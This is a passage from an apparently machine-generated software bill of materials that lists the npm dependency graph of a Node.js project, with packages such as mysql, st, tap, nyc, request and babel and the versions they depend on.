0.2"},{"ref":"303-mysql@2.18.1","dependsOn":["304-bignumber.js@9.0.0","170-readable-stream@2.3.7","174-safe-buffer@5.1.2","305-sqlstring@2.3.1"]},{"ref":"304-bignumber.js@9.0.0"},{"ref":"305-sqlstring@2.3.1"},{"ref":"306-node-cron@3.0.3","dependsOn":["307-uuid@8.3.2"]},{"ref":"307-uuid@8.3.2"},{"ref":"308-npmconf@0.0.24","dependsOn":["309-config-chain@1.1.12","312-inherits@1.0.2","313-ini@1.1.0","314-mkdirp@0.3.5","315-nopt@2.2.1","317-once@1.1.1","318-osenv@0.0.3","319-semver@1.1.4"]},{"ref":"309-config-chain@1.1.12","dependsOn":["310-ini@1.3.5","311-proto-list@1.2.4"]},{"ref":"310-ini@1.3.5"},{"ref":"311-proto-list@1.2.4"},{"ref":"312-inherits@1.0.2"},{"ref":"313-ini@1.1.0"},{"ref":"314-mkdirp@0.3.5"},{"ref":"315-nopt@2.2.1","dependsOn":["316-abbrev@1.1.1"]},{"ref":"316-abbrev@1.1.1"},{"ref":"317-once@1.1.1"},{"ref":"318-osenv@0.0.3"},{"ref":"319-semver@1.1.4"},{"ref":"320-optional@0.1.4"},{"ref":"321-st@0.2.4","dependsOn":["322-async-cache@0.1.5","324-fd@0.0.3","325-mime@1.2.11","326-negotiator@0.2.8","327-graceful-fs@1.2.3"]},{"ref":"322-async-cache@0.1.5","dependsOn":["323-lru-cache@2.3.1"]},{"ref":"323-lru-cache@2.3.1"},{"ref":"324-fd@0.0.3"},{"ref":"325-mime@1.2.11"},{"ref":"326-negotiator@0.2.8"},{"ref":"327-graceful-fs@1.2.3"},{"ref":"328-stream-buffers@3.0.2"},{"ref":"329-tap@11.1.5","dependsOn":["330-bind-obj-methods@2.0.0","23-bluebird@3.5.4","331-clean-yaml-object@0.1.0","332-color-support@1.1.3","333-coveralls@3.0.9","380-foreground-child@1.5.6","388-fs-exists-cached@1.0.0","389-function-loop@1.0.2","77-glob@7.1.3","386-isexe@2.0.0","16-js-yaml@3.13.1","390-minipass@2.9.0","392-mkdirp@0.5.1","394-nyc@11.9.0","621-opener@1.5.1","566-os-homedir@1.0.2","622-own-or@1.0.0","623-own-or-env@1.0.1","76-rimraf@2.6.3","387-signal-exit@3.0.2","624-source-map-support@0.5.16","625-stack-utils@1.0.2","626-tap-mocha-reporter@3.0.9","631-tap-parser@7.0.0","632-tmatch@3.1.0","633-trivial-deferred@1.0.1","634-tsame@1.1.2","635-write-file-atomic@2.4.3","636-yapool@1.0.0"]},{"ref":"330-bind-obj-methods@2.0.0"},{"ref":"331-clean-yaml-object@0.1.0"},{"ref":"332-color-support@1.1.3"},{"ref":"333-coveralls@3.0.9","dependsOn":["16-js-yaml@3.13.1","334-lcov-parse@1.0.0","335-log-driver@1.2.7","297-minimist@1.2.8","336-request@2.88.0"]},{"ref":"334-lcov-parse@1.0.0"},{"ref":"335-log-driver@1.2.7"},{"ref":"336-request@2.88.0","dependsOn":["337-aws-sign2@0.7.0","338-aws4@1.9.1","339-caseless@0.12.0","340-combined-stream@1.0.8","342-extend@3.0.2","343-forever-agent@0.6.1","344-form-data@2.3.3","348-har-validator@5.1.3","355-http-signature@1.2.0","369-is-typedarray@1.0.0","370-isstream@0.1.2","371-json-stringify-safe@5.0.1","346-mime-types@2.1.26","372-oauth-sign@0.9.0","373-performance-now@2.1.0","374-qs@6.5.2","174-safe-buffer@5.1.2","375-tough-cookie@2.4.3","378-tunnel-agent@0.6.0","379-uuid@3.3.2"]},{"ref":"337-aws-sign2@0.7.0"},{"ref":"338-aws4@1.9.1"},{"ref":"339-caseless@0.12.0"},{"ref":"340-combined-stream@1.0.8","dependsOn":["341-delayed-stream@1.0.0"]},{"ref":"341-delayed-stream@1.0.0"},{"ref":"342-extend@3.0.2"},{"ref":"343-forever-agent@0.6.1"},{"ref":"344-form-data@2.3.3","dependsOn":["345-asynckit@0.4.0","340-combined-stream@1.0.8","346-mime-types@2.1.26"]},{"ref":"345-asynckit@0.4.0"},{"ref":"346-mime-types@2.1.26","dependsOn":["347-mime-db@1.43.0"]},{"ref":"347-mime-db@1.43.0"},{"ref":"348-har-validator@5.1.3","dependsOn":["349-ajv@6.10.2","354-har-schema@2.0.0"]},{"ref":"349-ajv@6.10.2","dependsOn":["350-fast-deep-equal@2.0.1","351-fast-json-stable-stringify@2.1.0","352-json-schema-traverse@0.4.1","353-uri-js@4.2.2"]},{"ref":"350-fast-deep-equal@2.0.1"},{"ref":"351-fast-json-stable-stringify@2.1.0"},{"ref":"352-json-schema-traverse@0.4.1"},{"ref":"353-uri-js@4.2.2","dependsOn":["139-punycode@2.3.1"]},{"ref":"354-har-schema@2.0.0"},{"ref":"355-http-signature@1.2.0","dependsOn":["356-assert-plus@1.0.0","357-jsprim@1.4.1","361-sshpk@1.16.1"]},{"ref":"356-assert-plus@1.0.0"},{"ref":"357-jsprim@1.4.1","dependsOn":["356-assert-plus@1.0.0","358-extsprintf@1.3.0","359-json-schema@0.2.3","360-verror@1.10.0"]},{"ref":"358-extsprintf@1.3.0"},{"ref":"359-json-schema@0.2.3"},{"ref":"360-verror@1.10.0","dependsOn":["356-assert-plus@1.0.0","171-core-util-is@1.0.2","358-extsprintf@1.3.0"]},{"ref":"361-sshpk@1.16.1","dependsOn":["362-asn1@0.2.4","356-assert-plus@1.0.0","363-bcrypt-pbkdf@1.0.2","365-dashdash@1.14.1","366-ecc-jsbn@0.1.2","368-getpass@0.1.7","367-jsbn@0.1.1","145-safer-buffer@2.1.2","364-tweetnacl@0.14.5"]},{"ref":"362-asn1@0.2.4","dependsOn":["145-safer-buffer@2.1.2"]},{"ref":"363-bcrypt-pbkdf@1.0.2","dependsOn":["364-tweetnacl@0.14.5"]},{"ref":"364-tweetnacl@0.14.5"},{"ref":"365-dashdash@1.14.1","dependsOn":["356-assert-plus@1.0.0"]},{"ref":"366-ecc-jsbn@0.1.2","dependsOn":["367-jsbn@0.1.1","145-safer-buffer@2.1.2"]},{"ref":"367-jsbn@0.1.1"},{"ref":"368-getpass@0.1.7","dependsOn":["356-assert-plus@1.0.0"]},{"ref":"369-is-typedarray@1.0.0"},{"ref":"370-isstream@0.1.2"},{"ref":"371-json-stringify-safe@5.0.1"},{"ref":"372-oauth-sign@0.9.0"},{"ref":"373-performance-now@2.1.0"},{"ref":"374-qs@6.5.2"},{"ref":"375-tough-cookie@2.4.3","dependsOn":["376-psl@1.7.0","377-punycode@1.4.1"]},{"ref":"376-psl@1.7.0"},{"ref":"377-punycode@1.4.1"},{"ref":"378-tunnel-agent@0.6.0","dependsOn":["174-safe-buffer@5.1.2"]},{"ref":"379-uuid@3.3.2"},{"ref":"380-foreground-child@1.5.6","dependsOn":["381-cross-spawn@4.0.2","387-signal-exit@3.0.2"]},{"ref":"381-cross-spawn@4.0.2","dependsOn":["382-lru-cache@4.1.5","385-which@1.3.1"]},{"ref":"382-lru-cache@4.1.5","dependsOn":["383-pseudomap@1.0.2","384-yallist@2.1.2"]},{"ref":"383-pseudomap@1.0.2"},{"ref":"384-yallist@2.1.2"},{"ref":"385-which@1.3.1","dependsOn":["386-isexe@2.0.0"]},{"ref":"386-isexe@2.0.0"},{"ref":"387-signal-exit@3.0.2"},{"ref":"388-fs-exists-cached@1.0.0"},{"ref":"389-function-loop@1.0.2"},{"ref":"390-minipass@2.9.0","dependsOn":["174-safe-buffer@5.1.2","391-yallist@3.1.1"]},{"ref":"391-yallist@3.1.1"},{"ref":"392-mkdirp@0.5.1","dependsOn":["393-minimist@0.0.8"]},{"ref":"393-minimist@0.0.8"},{"ref":"394-nyc@11.9.0","dependsOn":["395-archy@1.0.0","396-arrify@1.0.1","397-caching-transform@1.0.1","404-convert-source-map@1.5.1","405-debug-log@1.0.1","406-default-require-extensions@1.0.0","409-find-cache-dir@0.1.1","416-find-up@2.1.0","380-foreground-child@1.5.6","422-glob@7.1.2","423-istanbul-lib-coverage@1.2.0","424-istanbul-lib-hook@1.1.0","426-istanbul-lib-instrument@1.10.1","459-istanbul-lib-report@1.1.3","463-istanbul-lib-source-maps@1.2.3","465-istanbul-reports@1.4.0","398-md5-hex@1.3.0","486-merge-source-map@1.1.0","487-micromatch@3.1.10","392-mkdirp@0.5.1","181-resolve-from@2.0.0","464-rimraf@2.6.2","387-signal-exit@3.0.2","565-spawn-wrap@1.4.2","568-test-exclude@4.2.1","587-yargs@11.1.0","620-yargs-parser@8.1.0"]},{"ref":"395-archy@1.0.0"},{"ref":"396-arrify@1.0.1"},{"ref":"397-caching-transform@1.0.1","dependsOn":["398-md5-hex@1.3.0","392-mkdirp@0.5.1","400-write-file-atomic@1.3.4"]},{"ref":"398-md5-hex@1.3.0","dependsOn":["399-md5-o-matic@0.1.1"]},{"ref":"399-md5-o-matic@0.1.1"},{"ref":"400-write-file-atomic@1.3.4","dependsOn":["401-graceful-fs@4.1.11","402-imurmurhash@0.1.4","403-slide@1.1.6"]},{"ref":"401-graceful-fs@4.1.11"},{"ref":"402-imurmurhash@0.1.4"},{"ref":"403-slide@1.1.6"},{"ref":"404-convert-source-map@1.5.1"},{"ref":"405-debug-log@1.0.1"},{"ref":"406-default-require-extensions@1.0.0","dependsOn":["407-strip-bom@2.0.0"]},{"ref":"407-strip-bom@2.0.0","dependsOn":["408-is-utf8@0.2.1"]},{"ref":"408-is-utf8@0.2.1"},{"ref":"409-find-cache-dir@0.1.1","dependsOn":["410-commondir@1.0.1","392-mkdirp@0.5.1","411-pkg-dir@1.0.0"]},{"ref":"410-commondir@1.0.1"},{"ref":"411-pkg-dir@1.0.0","dependsOn":["412-find-up@1.1.2"]},{"ref":"412-find-up@1.1.2","dependsOn":["413-path-exists@2.1.0","414-pinkie-promise@2.0.1"]},{"ref":"413-path-exists@2.1.0","dependsOn":["414-pinkie-promise@2.0.1"]},{"ref":"414-pinkie-promise@2.0.1","dependsOn":["415-pinkie@2.0.4"]},{"ref":"415-pinkie@2.0.4"},{"ref":"416-find-up@2.1.0","dependsOn":["417-locate-path@2.0.0"]},{"ref":"417-locate-path@2.0.0","dependsOn":["418-p-locate@2.0.0","421-path-exists@3.0.0"]},{"ref":"418-p-locate@2.0.0","dependsOn":["419-p-limit@1.2.0"]},{"ref":"419-p-limit@1.2.0","dependsOn":["420-p-try@1.0.0"]},{"ref":"420-p-try@1.0.0"},{"ref":"421-path-exists@3.0.0"},{"ref":"422-glob@7.1.2","dependsOn":["78-fs.realpath@1.0.0","79-inflight@1.0.6","82-inherits@2.0.3","83-minimatch@3.0.4","80-once@1.4.0","87-path-is-absolute@1.0.1"]},{"ref":"423-istanbul-lib-coverage@1.2.0"},{"ref":"424-istanbul-lib-hook@1.1.0","dependsOn":["425-append-transform@0.4.0"]},{"ref":"425-append-transform@0.4.0","dependsOn":["406-default-require-extensions@1.0.0"]},{"ref":"426-istanbul-lib-instrument@1.10.1","dependsOn":["427-babel-generator@6.26.1","443-babel-template@6.26.0","444-babel-traverse@6.26.0","432-babel-types@6.26.0","454-babylon@6.18.0","423-istanbul-lib-coverage@1.2.0","458-semver@5.5.0"]},{"ref":"427-babel-generator@6.26.1","dependsOn":["428-babel-messages@6.23.0","429-babel-runtime@6.26.0","432-babel-types@6.26.0","436-detect-indent@4.0.0","440-jsesc@1.3.0","434-lodash@4.17.10","441-source-map@0.5.7","442-trim-right@1.0.1"]},{"ref":"428-babel-messages@6.23.0","dependsOn":["429-babel-runtime@6.26.0"]},{"ref":"429-babel-runtime@6.26.0","dependsOn":["430-core-js@2.5.6","431-regenerator-runtime@0.11.1"]},{"ref":"430-core-js@2.5.6"},{"ref":"431-regenerator-runtime@0.11.1"},{"ref":"432-babel-types@6.26.0","dependsOn":["429-babel-runtime@6.26.0","433-esutils@2.0.2","434-lodash@4.17.10","435-to-fast-properties@1.0.3"]},{"ref":"433-esutils@2.0.2"},{"ref":"434-lodash@4.17.10"},{"ref":"435-to-fast-properties@1.0.3"},{"ref":"436-detect-indent@4.0.0","dependsOn":["437-repeating@2.0.1"]},{"ref":"437-repeating@2.0.1","dependsOn":["438-is-finite@1.0.2"]},{"ref":"438-is-finite@1.0.2","dependsOn":["439-number-is-nan@1.0.1"]},{"ref":"439-number-is-nan@1.0.1"},{"ref":"440-jsesc@1.3.0"},{"ref":"441-source-map@0.5.7"},{"ref":"442-trim-right@1.0.1"},{"ref":"443-babel-template@6.26.0","dependsOn":["429-babel-runtime@6.26.0","444-babel-traverse@6.26.0","432-babel-types@6.26.0","454-babylon@6.18.0","434-lodash@4.17.10"]},{"ref":"444-babel-traverse@6.26.0","dependsOn":["445-babel-code-frame@6.26.0","428-babel-messages@6.23.0","429-babel-runtime@6.26.0","432-babel-types@6.26.0","454-babylon@6.18.0","91-debug@2.6.9","455-globals@9.18.0","456-invariant@2.2.4","434-lodash@4.17.10"]},{"ref":"445-babel-code-frame@6.26.0","dependsOn":["446-chalk@1.1.3","433-esutils@2.0.2","453-js-tokens@3.0.2"]},{"ref":"446-chalk@1.1.3","dependsOn":["447-ansi-styles@2.2.1","448-escape-string-regexp@1.0.5","449-has-ansi@2.0.0","451-strip-ansi@3.0.1","452-supports-color@2.0.0"]},{"ref":"447-ansi-styles@2.2.1"},{"ref":"448-escape-string-regexp@1.0.5"},{"ref":"449-has-ansi@2.0.0","dependsOn":["450-ansi-regex@2.1.1"]},{"ref":"450-ansi-regex@2.1.1"},{"ref":"451-strip-ansi@3.0.1","dependsOn":["450-ansi-regex@2.1.1"]},{"ref":"452-supports-color@2.0.0"},{"ref":"453-js-tokens@3.0.2"},{"ref":"454-babylon@6.18.0"},{"ref":"455-globals@9.18.0"},{"ref":"456-invariant@2.2.4","dependsOn":["457-loose-envify@1.3.1"]},{"ref":"457-loose-envify@1.3.1","dependsOn":["453-js-tokens@3.0.2"]},{"ref":"458-semver@5.5.0"},{"ref":"459-istanbul-lib-report@1.1.3","dependsOn":["423-istanbul-lib-coverage@1.2.0","392-mkdirp@0.5.1","460-path-parse@1.0.5","461-supports-color@3.2.3"]},{"ref":"460-path-parse@1.0.5"},{"ref":"461-supports-color@3.2.3","dependsOn":["462-has-flag@1.0.0"]},{"ref":"462-has-flag@1.0.0"},{"ref":"463-istanbul-lib-source-maps@1.2.3","dependsOn":["165-debug@3.1.0","423-istanbul-lib-coverage@1.2.0","392-mkdirp@0.5.1","464-rimraf@2.6.2","441-source-map@0.5.7"]},{"ref":"464-rimraf@2.6.2","dependsOn":["422-glob@7.1.2"]},{"ref":"465-istanbul-reports@1.4.0","dependsOn":["466-handlebars@4.0.11"]},{"ref":"466-handlebars@4.0.11","dependsOn":["467-async@1.5.2","105-optimist@0.6.1","468-source-map@0.4.4","470-uglify-js@2.8.29"]},{"ref":"467-async@1.5.2"},{"ref":"468-source-map@0.4.4","dependsOn":["469-amdefine@1.0.1"]},{"ref":"469-amdefine@1.0.1"},{"ref":"470-uglify-js@2.8.29","dependsOn":["441-source-map@0.5.7","471-yargs@3.10.0","485-uglify-to-browserify@1.0.2"]},{"ref":"471-yargs@3.10.0","dependsOn":["472-camelcase@1.2.1","473-cliui@2.1.0","483-decamelize@1.2.0","484-window-size@0.1.0"]},{"ref":"472-camelcase@1.2.1"},{"ref":"473-cliui@2.1.0","dependsOn":["474-center-align@0.1.3","481-right-align@0.1.3","482-wordwrap@0.0.2"]},{"ref":"474-center-align@0.1.3","dependsOn":["475-align-text@0.1.4","480-lazy-cache@1.0.4"]},{"ref":"475-align-text@0.1.4","dependsOn":["476-kind-of@3.2.2","478-longest@1.0.1","479-repeat-string@1.6.1"]},{"ref":"476-kind-of@3.2.2","dependsOn":["477-is-buffer@1.1.6"]},{"ref":"477-is-buffer@1.1.6"},{"ref":"478-longest@1.0.1"},{"ref":"479-repeat-string@1.6.1"},{"ref":"480-lazy-cache@1.0.4"},{"ref":"481-right-align@0.1.3","dependsOn":["475-align-text@0.1.4"]},{"ref":"482-wordwrap@0.0.2"},{"ref":"483-decamelize@1.2.0"},{"ref":"484-window-size@0.1.0"},{"ref":"485-uglify-to-browserify@1.0.2"},{"ref":"486-merge-source-map@1.1.0","dependsOn":["108-source-map@0.6.1"]},{"ref":"487-micromatch@3.1.10","dependsOn":["488-arr-diff@4.0.0","489-array-unique@0.3.2","490-braces@2.3.2","552-define-property@2.0.2","513-extend-shallow@3.0.2","556-extglob@2.0.4","559-fragment-cache@0.2.1","536-kind-of@6.0.2","560-nanomatch@1.2.9","564-object.pick@1.3.0","553-regex-not@1.0.2","499-snapdragon@0.8.2","551-to-regex@3.0.2"]},{"ref":"488-arr-diff@4.0.0"},{"ref":"489-array-unique@0.3.2"},{"ref":"490-braces@2.3.2","dependsOn":["491-arr-flatten@1.1.0","489-array-unique@0.3.2","492-extend-shallow@2.0.1","494-fill-range@4.0.0","497-isobject@3.0.1","498-repeat-element@1.1.2","499-snapdragon@0.8.2","549-snapdragon-node@2.1.1","512-split-string@3.1.0","551-to-regex@3.0.2"]},{"ref":"491-arr-flatten@1.1.0"},{"ref":"492-extend-shallow@2.0.1","dependsOn":["493-is-extendable@0.1.1"]},{"ref":"493-is-extendable@0.1.1"},{"ref":"494-fill-range@4.0.0","dependsOn":["492-extend-shallow@2.0.1","495-is-number@3.0.0","479-repeat-string@1.6.1","496-to-regex-range@2.1.1"]},{"ref":"495-is-number@3.0.0","dependsOn":["476-kind-of@3.2.2"]},{"ref":"496-to-regex-range@2.1.1","dependsOn":["495-is-number@3.0.0","479-repeat-string@1.6.1"]},{"ref":"497-isobject@3.0.1"},{"ref":"498-repeat-element@1.1.2"},{"ref":"499-snapdragon@0.8.2","dependsOn":["500-base@0.11.2","91-debug@2.6.9","525-define-property@0.2.5","492-extend-shallow@2.0.1","541-map-cache@0.2.2","441-source-map@0.5.7","542-source-map-resolve@0.5.1","548-use@3.1.0"]},{"ref":"500-base@0.11.2","dependsOn":["501-cache-base@1.0.1","524-class-utils@0.3.6","505-component-emitter@1.2.1","533-define-property@1.0.0","497-isobject@3.0.1","538-mixin-deep@1.3.1","540-pascalcase@0.1.1"]},{"ref":"501-cache-base@1.0.1","dependsOn":["502-collection-visit@1.0.0","505-component-emitter@1.2.1","506-get-value@2.0.6","507-has-value@1.0.0","497-isobject@3.0.1","510-set-value@2.0.0","516-to-object-path@0.3.0","517-union-value@1.0.0","520-unset-value@1.0.0"]},{"ref":"502-collection-visit@1.0.0","dependsOn":["503-map-visit@1.0.0","504-object-visit@1.0.1"]},{"ref":"503-map-visit@1.0.0","dependsOn":["504-object-visit@1.0.1"]},{"ref":"504-object-visit@1.0.1","dependsOn":["497-isobject@3.0.1"]},{"ref":"505-component-emitter@1.2.1"},{"ref":"506-get-value@2.0.6"},{"ref":"507-has-value@1.0.0","dependsOn":["506-get-value@2.0.6","508-has-values@1.0.0","497-isobject@3.0.1"]},{"ref":"508-has-values@1.0.0","dependsOn":["495-is-number@3.0.0","509-kind-of@4.0.0"]},{"ref":"509-kind-of@4.0.0","dependsOn":["477-is-buffer@1.1.6"]},{"ref":"510-set-value@2.0.0","dependsOn":["492-extend-shallow@2.0.1","493-is-extendable@0.1.1","511-is-plain-object@2.0.4","512-split-string@3.1.0"]},{"ref":"511-is-plain-object@2.0.4","dependsOn":["497-isobject@3.0.1"]},{"ref":"512-split-string@3.1.0","dependsOn":["513-extend-shallow@3.0.2"]},{"ref":"513-extend-shallow@3.0.2","dependsOn":["514-assign-symbols@1.0.0","515-is-extendable@1.0.1"]},{"ref":"514-assign-symbols@1.0.0"},{"ref":"515-is-extendable@1.0.1","dependsOn":["511-is-plain-object@2.0.4"]},{"ref":"516-to-object-path@0.3.0","dependsOn":["476-kind-of@3.2.2"]},{"ref":"517-union-value@1.0.0","dependsOn":["518-arr-union@3.1.0","506-get-value@2.0.6","493-is-extendable@0.1.1","519-set-value@0.4.3"]},{"ref":"518-arr-union@3.1.0"},{"ref":"519-set-value@0.4.3","dependsOn":["492-extend-shallow@2.0.1","493-is-extendable@0.1.1","511-is-plain-object@2.0.4","516-to-object-path@0.3.0"]},{"ref":"520-unset-value@1.0.0","dependsOn":["521-has-value@0.3.1","497-isobject@3.0.1"]},{"ref":"521-has-value@0.3.1","dependsOn":["506-get-value@2.0.6","522-has-values@0.1.4","523-isobject@2.1.0"]},{"ref":"522-has-values@0.1.4"},{"ref":"523-isobject@2.1.0","dependsOn":["172-isarray@1.0.0"]},{"ref":"524-class-utils@0.3.6","dependsOn":["518-arr-union@3.1.0","525-define-property@0.2.5","497-isobject@3.0.1","530-static-extend@0.1.2"]},{"ref":"525-define-property@0.2.5","dependsOn":["526-is-descriptor@0.1.6"]},{"ref":"526-is-descriptor@0.1.6","dependsOn":["527-is-accessor-descriptor@0.1.6","528-is-data-descriptor@0.1.4","529-kind-of@5.1.0"]},{"ref":"527-is-accessor-descriptor@0.1.6","dependsOn":["476-kind-of@3.2.2"]},{"ref":"528-is-data-descriptor@0.1.4","dependsOn":["476-kind-of@3.2.2"]},{"ref":"529-kind-of@5.1.0"},{"ref":"530-static-extend@0.1.2","dependsOn":["525-define-property@0.2.5","531-object-copy@0.1.0"]},{"ref":"531-object-copy@0.1.0","dependsOn":["532-copy-descriptor@0.1.1","525-define-property@0.2.5","476-kind-of@3.2.2"]},{"ref":"532-copy-descriptor@0.1.1"},{"ref":"533-define-property@1.0.0","dependsOn":["534-is-descriptor@1.0.2"]},{"ref":"534-is-descriptor@1.0.2","dependsOn":["535-is-accessor-descriptor@1.0.0","537-is-data-descriptor@1.0.0","536-kind-of@6.0.2"]},{"ref":"535-is-accessor-descriptor@1.0.0","dependsOn":["536-kind-of@6.0.2"]},{"ref":"536-kind-of@6.0.2"},{"ref":"537-is-data-descriptor@1.0.0","dependsOn":["536-kind-of@6.0.2"]},{"ref":"538-mixin-deep@1.3.1","dependsOn":["539-for-in@1.0.2","515-is-extendable@1.0.1"]},{"ref":"539-for-in@1.0.2"},{"ref":"540-pascalcase@0.1.1"},{"ref":"541-map-cache@0.2.2"},{"ref":"542-source-map-resolve@0.5.1","dependsOn":["543-atob@2.1.1","544-decode-uri-component@0.2.0","545-resolve-url@0.2.1","546-source-map-url@0.4.0","547-urix@0.1.0"]},{"ref":"543-atob@2.1.1"},{"ref":"544-decode-uri-component@0.2.0"},{"ref":"545-resolve-url@0.2.1"},{"ref":"546-source-map-url@0.4.0"},{"ref":"547-urix@0.1.0"},{"ref":"548-use@3.1.0","dependsOn":["536-kind-of@6.0.2"]},{"ref":"549-snapdragon-node@2.1.1","dependsOn":["533-define-property@1.0.0","497-isobject@3.0.1","550-snapdragon-util@3.0.1"]},{"ref":"550-snapdragon-util@3.0.1","dependsOn":["476-kind-of@3.2.2"]},{"ref":"551-to-regex@3.0.2","dependsOn":["552-define-property@2.0.2","513-extend-shallow@3.0.2","553-regex-not@1.0.2","554-safe-regex@1.1.0"]},{"ref":"552-define-property@2.0.2","dependsOn":["534-is-descriptor@1.0.2","497-isobject@3.0.1"]},{"ref":"553-regex-not@1.0.2","dependsOn":["513-extend-shallow@3.0.2","554-safe-regex@1.1.0"]},{"ref":"554-safe-regex@1.1.0","dependsOn":["555-ret@0.1.15"]},{"ref":"555-ret@0.1.15"},{"ref":"556-extglob@2.0.4","dependsOn":["489-array-unique@0.3.2","533-define-property@1.0.0","557-expand-brackets@2.1.4","492-extend-shallow@2.0.1","559-fragment-cache@0.2.1","553-regex-not@1.0.2","499-snapdragon@0.8.2","551-to-regex@3.0.2"]},{"ref":"557-expand-brackets@2.1.4","dependsOn":["91-debug@2.6.9","525-define-property@0.2.5","492-extend-shallow@2.0.1","558-posix-character-classes@0.1.1","553-regex-not@1.0.2","499-snapdragon@0.8.2","551-to-regex@3.0.2"]},{"ref":"558-posix-character-classes@0.1.1"},{"ref":"559-fragment-cache@0.2.1","dependsOn":["541-map-cache@0.2.2"]},{"ref":"560-nanomatch@1.2.9","dependsOn":["488-arr-diff@4.0.0","489-array-unique@0.3.2","552-define-property@2.0.2","513-extend-shallow@3.0.2","559-fragment-cache@0.2.1","561-is-odd@2.0.0","563-is-windows@1.0.2","536-kind-of@6.0.2","564-object.pick@1.3.0","553-regex-not@1.0.2","499-snapdragon@0.8.2","551-to-regex@3.0.2"]},{"ref":"561-is-odd@2.0.0","dependsOn":["562-is-number@4.0.0"]},{"ref":"562-is-number@4.0.0"},{"ref":"563-is-windows@1.0.2"},{"ref":"564-object.pick@1.3.0","dependsOn":["497-isobject@3.0.1"]},{"ref":"565-spawn-wrap@1.4.2","dependsOn":["380-foreground-child@1.5.6","392-mkdirp@0.5.1","566-os-homedir@1.0.2","464-rimraf@2.6.2","387-signal-exit@3.0.2","567-which@1.3.0"]},{"ref":"566-os-homedir@1.0.2"},{"ref":"567-which@1.3.0","dependsOn":["386-isexe@2.0.0"]},{"ref":"568-test-exclude@4.2.1","dependsOn":["396-arrify@1.0.1","487-micromatch@3.1.10","298-object-assign@4.1.1","569-read-pkg-up@1.0.1","586-require-main-filename@1.0.1"]},{"ref":"569-read-pkg-up@1.0.1","dependsOn":["412-find-up@1.1.2","570-read-pkg@1.1.0"]},{"ref":"570-read-pkg@1.1.0","dependsOn":["571-load-json-file@1.1.0","576-normalize-package-data@2.4.0","585-path-type@1.1.0"]},{"ref":"571-load-json-file@1.1.0","dependsOn":["401-graceful-fs@4.1.11","572-parse-json@2.2.0","575-pify@2.3.0","414-pinkie-promise@2.0.1","407-strip-bom@2.0.0"]},{"ref":"572-parse-json@2.2.0","dependsOn":["573-error-ex@1.3.1"]},{"ref":"573-error-ex@1.3.1","dependsOn":["574-is-arrayish@0.2.1"]},{"ref":"574-is-arrayish@0.2.1"},{"ref":"575-pify@2.3.0"},{"ref":"576-normalize-package-data@2.4.0","dependsOn":["577-hosted-git-info@2.6.0","578-is-builtin-module@1.0.0","458-semver@5.5.0","580-validate-npm-package-license@3.0.3"]},{"ref":"577-hosted-git-info@2.6.0"},{"ref":"578-is-builtin-module@1.0.0","dependsOn":["579-builtin-modules@1.1.1"]},{"ref":"579-builtin-modules@1.1.1"},{"ref":"580-validate-npm-package-license@3.0.3","dependsOn":["581-spdx-correct@3.0.0","582-spdx-expression-parse@3.0.0"]},{"ref":"581-spdx-correct@3.0.0","dependsOn":["582-spdx-expression-parse@3.0.0","584-spdx-license-ids@3.0.0"]},{"ref":"582-spdx-expression-parse@3.0.0","dependsOn":["583-spdx-exceptions@2.1.0","584-spdx-license-ids@3.0.0"]},{"ref":"583-spdx-exceptions@2.1.0"},{"ref":"584-spdx-license-ids@3.0.0"},{"ref":"585-path-type@1.1.0","dependsOn":["401-graceful-fs@4.1.11","575-pify@2.3.0","414-pinkie-promise@2.0.1"]},{"ref":"586-require-main-filename@1.0.1"},{"ref":"587-yargs@11.1.0","dependsOn":["588-cliui@4.1.0","483-decamelize@1.2.0","416-find-up@2.1.0","597-get-caller-file@1.0.2","598-os-locale@2.1.0","614-require-directory@2.1.1","586-require-main-filename@1.0.1","615-set-blocking@2.0.0","589-string-width@2.1.1","616-which-module@2.0.0","617-y18n@3.2.1","618-yargs-parser@9.0.2"]},{"ref":"588-cliui@4.1.0","dependsOn":["589-string-width@2.1.1","591-strip-ansi@4.0.0","593-wrap-ansi@2.1.0"]},{"ref":"589-string-width@2.1.1","dependsOn":["590-is-fullwidth-code-point@2.0.0","591-strip-ansi@4.0.0"]},{"ref":"590-is-fullwidth-code-point@2.0.0"},{"ref":"591-strip-ansi@4.0.0","dependsOn":["592-ansi-regex@3.0.0"]},{"ref":"592-ansi-regex@3.0.0"},{"ref":"593-wrap-ansi@2.1.0","dependsOn":["594-string-width@1.0.2","451-strip-ansi@3.0.1"]},{"ref":"594-string-width@1.0.2","dependsOn":["595-code-point-at@1.1.0","596-is-fullwidth-code-point@1.0.0","451-strip-ansi@3.0.1"]},{"ref":"595-code-point-at@1.1.0"},{"ref":"596-is-fullwidth-code-point@1.0.0","dependsOn":["439-number-is-nan@1.0.1"]},{"ref":"597-get-caller-file@1.0.2"},{"ref":"598-os-locale@2.1.0","dependsOn":["599-execa@0.7.0","610-lcid@1.0.0","612-mem@1.1.0"]},{"ref":"599-execa@0.7.0","dependsOn":["600-cross-spawn@5.1.0","604-get-stream@3.0.0","605-is-stream@1.1.0","606-npm-run-path@2.0.2","608-p-finally@1.0.0","387-signal-exit@3.0.2","609-strip-eof@1.0.0"]},{"ref":"600-cross-spawn@5.1.0","dependsOn":["601-lru-cache@4.1.3","602-shebang-command@1.2.0","567-which@1.3.0"]},{"ref":"601-lru-cache@4.1.3","dependsOn":["383-pseudomap@1.0.2","384-yallist@2.1.2"]},{"ref":"602-shebang-command@1.2.0","dependsOn":["603-shebang-regex@1.0.0"]},{"ref":"603-shebang-regex@1.0.0"},{"ref":"604-get-stream@3.0.0"},{"ref":"605-is-stream@1.1.0"},{"ref":"606-npm-run-path@2.0.2","dependsOn":["607-path-key@2.0.1"]},{"ref":"607-path-key@2.0.1"},{"ref":"608-p-finally@1.0.0"},{"ref":"609-strip-eof@1.0.0"},{"ref":"610-lcid@1.0.0","dependsOn":["611-invert-kv@1.0.0"]},{"ref":"611-invert-kv@1.0.0"},{"ref":"612-mem@1.1.0","dependsOn":["613-mimic-fn@1.2.0"]},{"ref":"613-mimic-fn@1.2.0"},{"ref":"614-require-directory@2.1.1"},{"ref":"615-set-blocking@2.0.0"},{"ref":"616-which-module@2.0.0"},{"ref":"617-y18n@3.2.1"},{"ref":"618-yargs-parser@9.0.2","dependsOn":["619-camelcase@4.1.0"]},{"ref":"619-camelcase@4.1.0"},{"ref":"620-yargs-parser@8.1.0","dependsOn":["619-camelcase@4.1.0"]},{"ref":"621-opener@1.5.1"},{"ref":"622-own-or@1.0.0"},{"ref":"623-own-or-env@1.0.1","dependsOn":["622-own-or@1.0.0"]},{"ref":"624-source-map-support@0.5.16","dependsOn":["293-buffer-from@1.1.1","108-source-